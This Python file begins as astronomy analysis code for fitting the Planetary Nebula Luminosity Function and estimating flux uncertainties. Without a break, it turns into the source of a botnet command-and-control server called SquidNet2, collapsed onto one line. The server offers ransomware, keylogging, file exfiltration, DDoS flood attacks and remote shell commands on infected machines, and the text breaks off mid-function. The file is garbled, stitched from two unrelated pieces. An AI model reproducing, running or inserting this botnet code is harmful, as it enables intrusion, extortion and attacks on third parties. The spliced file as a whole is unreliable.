        return self.x, self.plus, self.minus

    def bootstrap(self, guess, N_boot=100):
        '''use bootstrapping to estimate the uncertainties'''
        loglike = lambda param, data: -np.sum(np.log(self.func(data, param, **self.kwargs)))
        result_bootstrap = np.zeros((N_boot))
        for i in range(N_boot):
            sample = np.random.choice(self.data, len(self.data))
            result_bootstrap[i] = minimize(loglike, guess, args=(sample,), method=self.method).x[0]
        return np.mean(result_bootstrap), np.std(result_bootstrap)

    def plot(self, limits=[]):
        '''plot the evidence, prior and likelihood for the given data over some parameter space'''
        if not hasattr(self, 'x'):
            logger.warning('run fit function first. I do it for you this time.')
            x, dp, dm = self.fit(28)
        else:
            x, dp, dm = self.x, self.plus, self.minus

        fig, (ax1, ax2) = subplots(nrows=2, ncols=1, figsize=(single_column, single_column), sharex=True)
        #fig = figure(figsize=(single_column,single_column))
        #ax1 = fig.add_subplot(2,1,1)
        #ax2 = fig.add_subplot(2,1,2,sharex=ax1)
        ax1.tick_params(labelbottom=False)

        ax1.plot(self.x_arr, self.prior_arr, label='prior', color=tab10[1])
        ax1.plot(self.x_arr, self.evidence_arr, label='evidence', color=tab10[0])
        l = ax1.plot(self.x_arr, self.likelihood_arr, label='likelihood', color=tab10[2])
        ax1.axvline(self.x, ls='--', c='k', lw=0.5)
        ax1.axvline(self.x_arr[self.low], ls='--', c='k', lw=0.5)
        ax1.axvline(self.x_arr[self.high], ls='--', c='k', lw=0.5)
        ax1.set_ylabel('likelihood')

        ax2.plot(self.x_arr[1:], self.integral, label='cumulative likelihood', color=tab10[2])
        ax2.axvline(self.x, ls='--', c='k', lw=0.5)
        ax2.axhline(0.5, ls='--', c='k', lw=0.5)
        ax2.axhline(0.5+0.683/2, ls='--', c='k', lw=0.5)
        ax2.axhline(0.5-0.683/2, ls='--', c='k', lw=0.5)
        ax2.axvline(self.x_arr[self.low], ls='--', c='k', lw=0.5)
        ax2.axvline(self.x_arr[self.high], ls='--', c='k', lw=0.5)

        ax1.legend()
        ax2.set_xlabel(r'$(m-M)$ / mag')
        ax2.set_ylabel('cumulative likelihood')
        if limits:
            ax1.set(xlim=limits)
            ax2.set(xlim=limits)
        ax1.set_title(f'{self.x:.3f}+{dp:.3f}-{dm:.3f}')
        ax1.annotate(f'{len(self.data)} data points', (0.02, 0.87), xycoords='axes fraction', fontsize=8)
        plt.subplots_adjust(hspace=.001)
        return fig

    def __call__(self, guess):
        '''use scipy minimize to find the best parameters'''
        return self.fit(guess)
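
# A minimal sketch of how this class combines with the PNLF defined below
# (assumes `data` holds apparent [OIII] magnitudes; the starting guess of 28
# mirrors the default used in `plot`): fixed keyword arguments such as `mhigh`
# are forwarded to the PDF, so the distance modulus is the only free parameter.
def _demo_fit_distance_modulus(data, completeness_limit, err=None):
    fitter = MaximumLikelihood1D(pnlf, data, err=err, mhigh=completeness_limit)
    mu, plus, minus = fitter.fit(28.0)   # best fit and 1 sigma interval
    return mu, plus, minus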

def f(m, mu, Mmax=-4.47):
    '''luminosity function (=density)'''
    return np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu)))


def F(m, mu, Mmax=-4.47):
    '''indefinite integral of the luminosity function'''
    #return np.exp(-0.307*mu) * (np.exp(0.307*m)/0.307 + np.exp(3*(Mmax-mu)-2.693*m) / 2.693)
    return np.exp(0.307*(m-mu))/0.307 + np.exp(2.693*(mu-m)+3*Mmax)/2.693
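
# Illustrative sanity check (not used by the pipeline): F is the
# antiderivative of f, so a central difference of F should reproduce f.
def _check_F_is_antiderivative(m=26.0, mu=28.0, h=1e-5):
    numeric = (F(m+h, mu) - F(m-h, mu)) / (2*h)   # numerical dF/dm at m
    return np.isclose(numeric, f(m, mu))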

def pnlf(m, mu, mhigh, Mmax=-4.47):
    '''Planetary Nebula Luminosity Function (PNLF)

    N(m) ~ e^0.307(m-mu) * (1-e^3(Mmax-m+mu))

    The normalization is calculated by integrating from Mmax+mu (the root of
    the function) to the specified completeness limit. Objects that lie
    outside this interval are ignored.

    Parameters
    ----------
    m : ndarray
        apparent magnitudes of the PNs

    mu : float
        distance modulus

    mhigh : float
        completeness limit (magnitude of the faintest sources that are
        consistently detected). Required for normalization.
    '''
    m = np.atleast_1d(m)
    mlow = Mmax+mu
    normalization = 1/(F(mhigh, mu) - F(mlow, mu))
    out = normalization * np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu)))
    out[(m > mhigh) | (m < mlow)] = 0
    return out


def PNLF(bins, mu, mhigh, Mmax=-4.47):
    '''integrated Planetary Nebula Luminosity Function

    Parameters
    ----------
    bins : ndarray
        Defines a monotonically increasing array of bin edges.

    mu : float
        Distance modulus

    mhigh : float
        Completeness limit (magnitude of the faintest sources that are
        consistently detected). Required for normalization.

    Mmax : float
        Magnitude of the brightest PN.
    '''
    mlow = mu+Mmax
    lower = bins[:-1]
    upper = bins[1:]
    normalization = 1/(F(mhigh, mu, Mmax=Mmax)-F(mlow, mu, Mmax=Mmax))
    #out = normalization * (np.exp(2.693*mu + 3.*Mmax) * (-0.371333/np.exp(2.693*lower)) + 0.371333/np.exp(2.693*upper)) + (-3.25733*np.exp(0.307*lower) + 3.25733*np.exp(0.307*upper))/np.exp(0.307*mu)
    out = normalization * (F(upper, mu, Mmax=Mmax) - F(lower, mu, Mmax=Mmax))
    out[out < 0] = 0
    return out
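
# Sketch of the intended use of PNLF (an illustration, not taken from the
# original pipeline): scale the per-bin probabilities by the number of
# observed PN to get expected counts that can be compared to a histogram.
def _demo_binned_pnlf(data, mu, completeness_limit, binsize=0.25):
    # bin edges from the bright cutoff up to the completeness limit
    bins = np.arange(mu-4.47, completeness_limit, binsize)
    observed, _ = np.histogram(data, bins=bins)
    expected = len(data[data < completeness_limit]) * PNLF(bins, mu, completeness_limit)
    return bins, observed, expected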

def cdf(x, mu, mhigh, Mmax=-4.47):
    '''Cumulative distribution function for PNe'''
    mlow = mu+Mmax
    normalization = 1/(F(mhigh, mu, Mmax=Mmax)-F(mlow, mu, Mmax=Mmax))
    out = normalization * (F(x, mu, Mmax=Mmax) - F(mlow, mu, Mmax=Mmax))
    out[x < mlow] = 0
    out[x > mhigh] = 1
    return out


def sample_pnlf(size, mu, cl):
    '''draw random magnitudes from the PNLF by inverting the cumulative distribution'''
    Nbins = 1000
    x = np.linspace(mu-4.47, cl, Nbins)
    cdf_vals = np.cumsum(pnlf(x, mu, cl))*(cl-mu+4.47)/Nbins
    u = np.random.uniform(size=size)
    return np.interp(u, cdf_vals, x)

'''
from scipy.stats import ks_2samp
from pnlf.analyse import sample_pnlf

sampled_data = sample_pnlf(10000, galaxy.mu, galaxy.completeness_limit)
ks, pv = ks_2samp(data, sampled_data)
print(f'statistic={ks:.3f}, pvalue={pv:.3f}')
'''

def prior(mu):
    '''Gaussian prior on the distance modulus'''
    mu0 = 29.91
    std = 0.13
    return 1 / (std*np.sqrt(2*np.pi)) * np.exp(-(mu-mu0)**2 / (2*std**2))


def N25(mu, completeness, data, deltaM):
    '''calculate the number of PN within deltaM of the cutoff

    The cutoff of the luminosity function is at mu-4.47.

    Step 1: count the PN in the data between the cutoff and the completeness limit.
    Step 2: calculate the same number from the theoretical function.
    Step 3: calculate the theoretical number between the cutoff and cutoff+deltaM.
    Step 4: scale the number from Step 1 with the results from Steps 2 and 3.

    Parameters
    ----------
    mu : float
        distance modulus

    completeness : float
        completeness limit (upper limit for the PNLF). Used for normalization.

    data : ndarray
        array of magnitudes

    deltaM : float
        interval above the cutoff
    '''
    cutoff = mu - 4.47
    N_total = len(data[data < completeness])
    p_deltaM = (F(cutoff+deltaM, mu) - F(cutoff, mu)) / (F(completeness, mu) - F(cutoff, mu))
    return N_total * p_deltaM

def estimate_uncertainties_from_SII(tbl, plot=False):
    '''estimate realistic flux uncertainties from the [SII] doublet

    The uncertainties in the PHANGS-MUSE DAP products are somewhat
    underestimated. To get a better handle on the errors, we use the fact
    that the SII6716/SII6730 ratio should theoretically be 1.4484. Any
    deviation from this value can be attributed to the errors in the
    measurements. We divide the deviation by the error of the ratio; this
    should follow a Gaussian with width 1. From the actual width of the
    distribution we can estimate the real uncertainty of the data.

    To use Francesco's catalogue instead:
    ```
    with fits.open(data_ext/'Products'/'Nebulae catalogue'/'Nebulae_catalogue_v2.fits') as hdul:
        nebulae = Table(hdul[1].data)
    nebulae['gal_name'][nebulae['gal_name']=='NGC628'] = 'NGC0628'
    nebulae = nebulae[(nebulae["flag_edge"] == 0) & (nebulae["flag_star"] == 0) &
                      (nebulae["BPT_NII"] == 0) & (nebulae["BPT_SII"] == 0) &
                      (nebulae["BPT_OI"] == 0) & (nebulae['HA6562_SIGMA'] < 100)]
    nebulae.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],
                           ['SII6730','SII6730_err','SII6716','SII6716_err'])
    nebulae['type'] = 'HII'
    ```
    '''
    if tbl is None:
        from astropy.io import fits
        with fits.open(Path('a:') / 'MUSE_DR2' / 'Nebulae catalogue' / 'Nebulae_Catalogue_DR2_native.fits') as hdul:
            tbl = Table(hdul[1].data)
        tbl['gal_name'][tbl['gal_name']=='NGC628'] = 'NGC0628'
        tbl = tbl[(tbl["flag_edge"] == 0) & (tbl["flag_star"] == 0) &
                  (tbl["BPT_NII"] == 0) & (tbl["BPT_SII"] == 0) &
                  (tbl["BPT_OI"] == 0) & (tbl['HA6562_SIGMA'] < 100)]
        tbl.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],
                           ['SII6730','SII6730_err','SII6716','SII6716_err'])
        tbl['type'] = 'HII'

    tmp = tbl[(tbl['type']=='HII') & (tbl['SII6730']>0) & (tbl['SII6716']>0)]
    logger.info(f'sample contains {len(tmp)} nebulae')

    ratio = tmp['SII6716'] / tmp['SII6730']
    ratio_err = ratio * np.sqrt((tmp['SII6716_err']/tmp['SII6716'])**2+(tmp['SII6730_err']/tmp['SII6730'])**2)

    # keep only the positive deviations from the theoretical ratio
    diff_norm = (ratio-1.4484) / ratio_err
    diff_norm = diff_norm[diff_norm > 0]

    # fit the width of the Gaussian that the normalized deviations follow
    gauss = lambda x, mu, std: 1/np.sqrt(2*np.pi*std**2) * np.exp(-0.5 * ((x - mu) / std)**2)
    log_likelihood = lambda std, x: -np.sum(np.log(gauss(x, 0, std)))
    std = minimize(log_likelihood, [1], args=(diff_norm,)).x[0]

    if plot:
        fig, ax = plt.subplots(figsize=(4, 3))
        hist, bins, patches = ax.hist((ratio-1.4484) / ratio_err, bins=20, range=(0, 6), color='silver')
        y2 = gauss(bins, 0, 1)
        ax.plot(bins, hist[0]/y2[0]*y2, '--', label='std=1', color='tab:blue')
        y = gauss(bins, 0, std)
        ax.plot(bins, hist[0]/y[0]*y, '--', label=f'std={std:.2f}', color='tab:red')
        ax.legend()
        ax.set(xlabel="Deviation / Error", ylabel="Number of regions", yscale='log', ylim=[1, 1.5*hist[0]])
        plt.show()

    logger.info(f'std={std:.3f}')
    return std
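
# One possible use of the fitted width (an assumption about the intended
# workflow, not taken from the original code): inflate the reported flux
# uncertainties by the estimated factor before running the diagnostics.
def _demo_rescale_errors(tbl, columns=('SII6716_err', 'SII6730_err')):
    std = estimate_uncertainties_from_SII(tbl)
    for col in columns:
        tbl[col] *= std   # scale up the underestimated errors
    return tbl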
import socket, threading, hashlib, os, datetime, time, sqlite3, shutil, urllib.request, json, sys class BotNet: """Main Class for the BotNet. Every single line of server code, payload code is inside of this class. There are many functions inside of the class, where they have many different uses. They vary in usefullness and effectiveness, nonetheless they all contribute to the overall functioning of the server. It uses a lot of logic and similar code from DatCord, which was a server that truly displayed my advancements in network programming, where it also is an improvement from the previous SquidNet. SquidNet2 does not have as many bugs, and also not as many useless functions. This script remains unfinished(I worked on it a lot on an airplane DX), so there could be many problems that could possibly occur.""" def logo(self): """Logo of the script, nothing too special here.""" logo = """ /\\ //\\\\ //__\\\\ //____\\\\ \\\____// \\\__// [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] /) [|__|] (\\ //\_________[|__|]________/\\\\ ))__________||__||_________(( <_/ [ \/ ] \_> || || || || || || || || || || || || || || || || || || _________ .__ .||_||_||__ __ ________ _____ _______ / _____/ ________ __|__| __|||/\ \ _____/ |_\_____ \ ___ __/ | | \ _ \ \_____ \ / ____/ | \ |/ __ | / | \_/ __ \ __\/ ____/ \ \/ / | |_ / /_\ \ / < <_| | | / / /_/ |/ | \ ___/| | / \ \ / ^ / \ \_/ \\ /_______ /\__ |____/|__\____ |\____|__ /\___ >__| \_______ \ \_/\____ | /\ \_____ / \/ |__| \/ || || \/ \/ \/ |__| \/ \/ || || || || || || || || || || || || || || || || || || \\\ || // \\\||// \\\// ____-\/-____ -__- / \\ Advanced Botnet By DrSquid [+] Github: https://github.com/DrSquidX""" return logo def __init__(self, ip, port, version, external_ip=None, external_port=None, admin_user="admin", admin_pass="adminpassword12345", logfile="log.txt", enc_key=b'iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8=', ftp_dir="Bot_Files", ransomware_active=True): """Initiation of the class. Most of every important variable is mentioned here. This function is very important, as it has the definitions of all of the important variables needed for functionality, and also for specification of different things. Many things are defined here, such as the socket that will be used to handle all of the connections, as well as all of the smaller, yet very important variables that would hinder the performace and functionality of the script, if they were to be missing. 
There is also the use of some functions, as they are needed to help configure different things inside of the server.""" self.ip = ip self.port = int(port) self.downloading = False self.ddosing = False self.enc_key = enc_key self.botdownload = None self.ftp_dir = ftp_dir self.ransomware_active = ransomware_active self.external_ip = external_ip self.external_port = external_port self.admin_online = False self.logfile = logfile self.sqlfilename = "Server.db" self.filetransfer = False self.sqlconnected = False self.sending_file = False self.auto_ban = False self.keylogging = False self.botinfofile = "botinfo.txt" self.timetoautoban = 0 botinfo = open(self.botinfofile,"w").close() self.max_connpersec = 20 self.connpersec = 0 self.conncount = 0 self.timer = 1 self.conf_dbfile() file = open(self.logfile, "w").close() self.log(self.logo()) self.version = version if self.external_ip is None: self.external_ip = self.ip if self.external_port is None: self.external_port = self.port if self.ransomware_active: self.quot = "" else: self.quot = "'''" self.payload = self.gen_payload() self.payloadfile = open("SquidBot.py","w") self.payloadfile.write(self.payload) self.payloadfile.close() if self.ftp_dir not in os.listdir(): os.mkdir(self.ftp_dir) self.log(f"""[({datetime.datetime.today()})][(INFO)]: Server Started on {self.ip}:{self.port} [({datetime.datetime.today()})][(INFO)]: Bots/Admins will connect to: {self.external_ip}:{self.external_port} [({datetime.datetime.today()})][(INFO)]: Payload Bot Script Generated in {os.path.join(os.getcwd(), "SquidBot.py")}""") self.botnum = 1 self.connlist = [] self.botinfo = [] self.adminconn = None self.focusing = False self.focus_conn = None self.focus_botname = "" self.admin_username = admin_user self.admin_password = hashlib.sha256(admin_pass.encode()).hexdigest() self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shutil.copyfile(os.path.join(os.getcwd(),self.payloadfile.name), os.path.join(os.getcwd(),self.ftp_dir,self.payloadfile.name)) self.log(f"[({datetime.datetime.today()})][(SERVER)]: Payload file has been transferred to the FTP directory(for extraction of Admin).") def exec_sql_cmd(self, file, cmd): """Optimization code made for executing commands on db files. The reason it was made was for optimization purposes. This excerpt of code would be pretty much all over the place in this script if it weren't a function, and it would make the script look less elegant and clean with all of the repitition.""" output = "" try: db = sqlite3.connect(file) cursor = db.cursor() cursor.execute(cmd) output = cursor.fetchall() db.commit() cursor.close() db.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(RESETSQL)]: Error with SQL Database file '{self.sqlfilename}': {e}, reconfiguring as a precaution.") self.conf_dbfile() return output def conf_dbfile(self): """This function helps configure the database file that contains the IP whitelists and banlists. As you can see, there is the previous function that was used to optimize the code. 
What the function truly does, is create the Database file if it doesn't already exist, and create the tables containing the IP banlist and whitelist if they do not exist.""" try: file = open(self.sqlfilename,"rb") except: file = open(self.sqlfilename,"wb") file.close() self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipbanlist(ip)") self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipallowlist(ip)") def return_iplist(self, list_type): """This gets a list of the IPs, although you need to specify whether it is from the IP Whitelist or the Banlist.""" banned_ips = self.exec_sql_cmd(self.sqlfilename, f"select ip from ip{list_type}list") new_ip_list = [] for i in banned_ips: new_ip_list.append(i[0]) return new_ip_list def add_ip(self, ip, list_type): """This adds an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"insert into ip{list_type}list values('{ip}')") def remove_ip(self, ip, list_type): """This removes an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"delete from ip{list_type}list where ip = '{ip}'") def help_msg(self): """The help message sent to the admins if they request it. It contains all of the information about the commands, and also the commands themselves. The arguements are provided, so that the user can get a sense of how to actually use the commands effectively.""" return """\n[(SERVER)]: Info about each command: [+] Utilities: [+] !whitelistip <ip> - Adds an IP to the whitelist, allowing them to connect to the server during a DDoS Attack. [+] !unwhitelistip <ip> - Removes an IP from the whitelist. [+] !banip <ip> - Bans an IP from the server, therefore having them kicked every time they try to connect to the server. [+] !unbanip <ip> - Removes an IP from the server. [+] !focusconn <botname> - Only be able to send or see messages from a single bot. [+] !stopfocus - Stops focus mode. [+] !getipwhitelist - Obtains the list of the IP Addresses in the Whitelist. [+] !getipbanlist - Obtains the list of the IP Addresses in the Banlist. [+] !getbotinfo - Displays information from each of the bots. [+] !help - Displays this message. [+] !startftp - Start file transfer protocol between the admin and the server(to get any transferred Bot Files). [+] !togglelisten - Toggles the setting for the server to listen for connections or not. [+] Bot Commands: [+] !filedownload <file> - Download a file on a single bot computer(requires focus mode). [+] !download <file> <link> - Make the bot download a file from the internet. [+] !mkdir <dir> - Create a folder inside of the bots working directory. [+] !delfolder <dir> - Remove a folder inside of the bots working directory. [+] !createfile <filename> - Create a file in the bots. [+] !delfile <filename> - Delete a file in the bots. [+] !encfile <filename> - Encrypt a file inside of the bots. [+] !decrypt <filename> - Decrypt a file that has been encrypted. [+] !open <filename> - Open a file inside of the bots working directory. [+] !viewfilecontent <file> - View the contents of a file in the bots directory. [+] !writefile <filename> - Open and write inside of a file inside of the bots. [+] !sqlconnect <sqlfile> - Connect to a Sqlite3 Compatable Database file in the bots. [+] !changedir <dir> - Changes the bots working directory to the one specified(use '%user%' as the user for multiple bots). [+] !stopsql - Disconnect from the connected Database file. [+] !stopwrite - Close writing mode and return to normal. 
[+] !getcwd - Get the current directory of the bots. [+] !keylog - Activate keylogging to see the bots keystrokes. [+] !stopkeylog - Stops the keylogging. [+] !listdir - List all of the items in the bots working directory. [+] !ransomware - Activates the ransomware program inside of the bots. [+] DDoS Attack Commands: [+] !httpflood <website> <delay> - Make the bots conduct an HTTP Flood Attack on the specified Website. [+] !tcpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a TCP Flood Attack on the specified IP and Port. [+] !udpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a UDP Flood Attack on the specified IP and Port. [+] !stopatk - Stops the current DDoS Attack that is happening(only one can happen at a time). [+] Note: Any other instructions will be run as shell commands on the remote computers.""" def file_tranfer_help_msg(self): """If the user decides to go onto FTP mode, they will be able to extract files that were extracted from the server via the connected bots. This is the help message sent to the user, if they request help. Like the previous help message, it has all the commands and the information and parameters about them, for the user to use these commands effectively.""" return """\n[(SERVER)]: Info about each command in FTP Mode. [+] !help - Displays this message. [+] !fileinfo - Displays all of the files inside of Server's directory. [+] !download [filename] - Downloads a specified file inside of the Server's directory. [+] !listdir - Gets all of the files inside of the Server's directory. [+] !stopftp - Return to the Botnet and controlling the bots. [+] Note: You will be unable to send messages to the bots in FTP Mode. You can return to normal by inputting '!stopftp'. """ def start(self): """This function is vital for the functionality of the server, because it actually starts it! It simply tries to bind the server to the IP and Port that were provided in the config file. If it doesn't work, an error message will be displayed, so that the user can get a sense of the problem.""" working = False try: self.server.bind((self.ip, self.port)) working = True except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with binding the server: {e}. Try to change some of the variables in the Config files if needed.") if working: self.listener = threading.Thread(target=self.listen).start() def conn_persec_timer(self): """Function used for the not-so-perfect Anti-DDoS System. 
It measure the connections per second, and decides whether to take action against them(by that I mean banning them).""" while True: time.sleep(1) self.timer += 1 if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.max_connpersec <= self.connpersec: self.timetoautoban += 1 if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 if self.timer >= 60: self.timer = 1 self.connpersec = 1 self.conncount = 0 try: self.connpersec = self.conncount / self.timer except: pass def config_conn_vars(self): """Optimization code made for less repitition.""" self.connpersec = self.conncount / self.timer if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 self.conncount += 1 if self.max_connpersec <= self.connpersec: if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 def listen(self): """A very important function for the server. It listens to all of the connections, if it is able to, as the 'self.listening' variable can be toggled on and off, making the server unable to listen for connections. It also has some of the Anti-DDoS code, where it also closes any connections inside of the banlist, and allows connections in the whitelist into the server without any interruption.""" self.log(f'[({datetime.datetime.today()})][(LISTEN)]: Server is listening.....') self.listening = True connpersectimer = threading.Thread(target=self.conn_persec_timer) connpersectimer.start() while True: if self.listening: try: self.server.listen() conn, ip = self.server.accept() if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.listening: kicked = False if ip[0] in self.return_iplist("ban"): conn.close() kicked = True else: if self.auto_ban: if ip[0] in self.return_iplist("allow"): self.config_conn_vars() else: self.log(f"[({datetime.datetime.today()})][(BANNING_IP)]: {ip[0]} attempted to join the server during the DDoS Attack, banning as a precaution.") self.add_ip(ip[0],"ban") conn.close() kicked = True else: self.config_conn_vars() if not kicked: conn.send(f"SquidNet Server v{self.version}".encode()) handler = threading.Thread(target=self.handle, args=(conn, ip)) handler.start() else: conn.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with listening for connections: {e}") def obtain_botname_list(self): botnames = [] for i in self.botinfo: botnames.append(i[0]) return botnames def parse_info_msg(self, infomsg, conn, srcport): """There is a message sent by every client to the server, which would contain information about them. This include their hostname, IP Address, User, and Operating System. This is mainly for the bots, so that the admin would have a sense of the computer they have take control of. 
It returns a list of all of the information, to be used later.""" try: name = f"{infomsg.split()[1]}{self.botnum}" except: name = f"Bot{self.botnum}" self.botnum += 1 try: ip = infomsg.split()[2] except: ip = "127.0.0.1" try: osuser = infomsg.split()[3] except: osuser = "Unknown" try: os = infomsg.split()[4] except: os = "Unknown" self.botnum += 1 ogcontent = open(self.botinfofile,"r") content = ogcontent.read() file = open(self.botinfofile,"w") file.write(content) file.write(f"\n[+] Botname: {name}\n[+] IP: {ip}\n[+] Src Port: {srcport}\n[+] User: {osuser}\n[+] OS: {os}\n[+] Conn: {conn}\n") file.close() return [name, ip, srcport, osuser, os, conn] def get_filename(self, msg): """When there is a file trying to be provided for file transfering(etc), there might be files with names with spaces in them. This is a problem with my old system of file name obtaining, as the filenames with spaces would only have the first word of the file used to create or do something with said file. This function fixes that problem, by returning the actual name of the file.""" msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def log(self, logitem, display=True): """Important function, needed for logging. This is so that the Server Owner can see what happened in the server, in case of a crash or bug that needed to be fixed. This helps, as all of the output in the server is the same as the output in the log file. The server owner would be able to see any bugs or issues, or easily anything that happened in the server at all. However, the log file is wiped everytime the server restarts(I can easily change that, you can contact me if you want that to happen).""" content = "" if display: print(logitem) try: file = open(self.logfile, "r") content = file.read() file.close() except Exception as e: print(f"[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.") content = f"""{self.logo()}\n[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.""" file = open(self.logfile,"w") file.write(content+"\n"+logitem) file.close() def send_to_other(self, sender, reciever, msg, recieverconn, send_raw=False): """Code for optimizing sending and logging at the same time. It logs the message that is being sent, and it also sends the message to the connection that the sender its trying to send to.""" item = f"[({datetime.datetime.today()})][({sender})--->({reciever})]: {msg}" self.log(item) if not send_raw: recieverconn.send(f"\n[({sender})]: {msg}".encode()) else: recieverconn.send(msg.encode()) def send_file(self, filename, conn): """Function needed for FTP. It sends all of the bytes of the file being transferred to the specified connection, which in this case it will be the server admin due to the function only being used in the transferring of files from the server to the server admin.""" self.sending_file = True file = open(filename, "rb") time.sleep(2) while True: sendto = file.read(10240) if not sendto: time.sleep(2) conn.send("!stopsave".encode()) break else: conn.send(sendto) time.sleep(5) self.send_to_other("SERVER",self.admin_username,"File Transfer completed.", conn) def handle(self, conn, ip): """Very important function, needed for handling the connections of the clients. The way a bot is recognized is quite simple really. There are many variables that help with the process. 
The handler first uses the information packet(the one with all of the client information), to see if the bot is a bot or a fake bot. If the information packet is invalid(if it does not start with '!botreg'), the connection will be simply closed. If the packet is valid, the Bot will have the ability to become an admin(if they have the correct credentials). If they are not an admin, they cannot do anything to take control of the server, but simply be able to send messages around to the admin and server. If the Bot is trying to be an admin, they can send an authentication message(in this case its '!login') followed by the credentials. These credentials are not displayed on the log. For authentication to happen. The username is checked with the server variable to see if they match. If they do, now the passwords need to match. There is password hashing in the server(sha256 hashing algorithm), for further security and to prevent any breaches. The password provided would be hashed into sha256, to see if it matches with the hashed password that the server has. It these all match, access is granted to the admin, where they can now do whatever they want with the bots, whether good or bad. There are many things to do with the assortment of commands that are provided.""" bot = False name = ip admin = False registered = False while True: try: display_single_msg = True msg_from_bot = conn.recv(10240) try: msg = str(msg_from_bot.decode()).strip() except: msg = str(msg) if msg.strip() != "": if not bot: info_packet = msg if not info_packet.startswith("!botreg"): conn.close() break else: self.connlist.append(conn) info = self.parse_info_msg(msg, conn, ip[1]) self.botinfo.append(info) name = info[0] ipaddr = info[2] if ipaddr in self.return_iplist("ban"): conn.close() break registered = True original_name = name self.log(f"[({datetime.datetime.today()})][(BOTJOIN)]: Bot {name} has joined the botnet.") try: self.adminconn.send(f"\n[(SERVER)]: Bot {name} has joined the botnet.".encode()) except: pass bot = True elif bot: if not admin: if msg.startswith("!login"): if not self.admin_online: try: username = msg.split()[1] password = msg.split()[2] if username == self.admin_username and hashlib.sha256(password.encode()).hexdigest() == self.admin_password: self.log(f"[({datetime.datetime.today()})][(INFO)]: A new admin session has been created.") name = self.admin_username admin = True self.adminconn = conn self.admin_online = True self.send_to_other("SERVER",name,"Successfully logged into the Botnet. You have access to all of the bots.", conn) self.send_to_other("SERVER",name,"Input '!help' if you need more info on the commands.", conn) for i in self.botinfo: if i[0] == original_name: self.botinfo.remove(i) break else: self.send_to_other("SERVER",name,"Authentication Failed.", conn) except: pass else: self.send_to_other("SERVER",name,"There is already an active owner session. 
Please wait until they log off.", conn) elif msg.startswith("!key") and self.keylogging: keystroke = msg.split()[1] keyfile = open(name+".txt","r") content = keyfile.read() keyfile.close() newkeyfile = open(name+".txt","w") newkeyfile.write(content) newkeyfile.write(f"\n[+] {keystroke}") newkeyfile.close() else: try: display_single_msg = False if not self.focusing: display_single_msg = True else: if conn == self.focus_conn: if not self.downloading: self.send_to_other(name, self.admin_username,msg, self.adminconn) else: try: if msg == "!stopsave": self.downloading = False self.botdownload.close() elif msg == "!fileerror": self.downloading = False self.botdownload.close() os.remove(self.botdownload.name) self.send_to_other("SERVER",self.admin_username,"There was an error with downloading the bot's file. Cancelling the download.") else: self.botdownload.write(msg_from_bot) except Exception as e: self.botdownload.write(msg_from_bot) except: display_single_msg = True elif admin: if not self.filetransfer: if msg.startswith("!help"): self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the help message.") self.adminconn.send(self.help_msg().encode()) elif msg.startswith("!startftp"): self.send_to_other("SERVER",name, "Activiting FTP mode. You will be able to get files inside of the servers directory(for ex downloaded bot Files).", conn) self.send_to_other("SERVER",name, "You can input '!help' in case you need to know what commands are there for you.", conn) self.filetransfer = True elif msg.startswith("!focusconn"): try: botname = msg.split()[1] found = False for i in self.botinfo: if i[0] == botname: self.focus_conn = i[len(i)-1] found = True if found: self.send_to_other("SERVER",name,f"You can now only see output from bot {botname}.", conn) self.focus_botname = botname self.focusing = True except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !focusconn <botname>", conn) elif msg.startswith("!banip"): try: banned_ip = msg.split()[1] if banned_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is in the whitelist! Unwhitelist it to ban it.", conn) elif banned_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the banlist!", conn) else: self.add_ip(banned_ip, "ban") self.send_to_other("SERVER",name,f"IP Address '{banned_ip}' has been banned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !banip <ip>", conn) elif msg.startswith("!unbanip"): try: unbanning_ip = msg.split()[1] if unbanning_ip not in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the banlist!", conn) else: self.remove_ip(unbanning_ip,"ban") self.send_to_other("SERVER",name,f"IP Address '{unbanning_ip}' has been unbanned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! 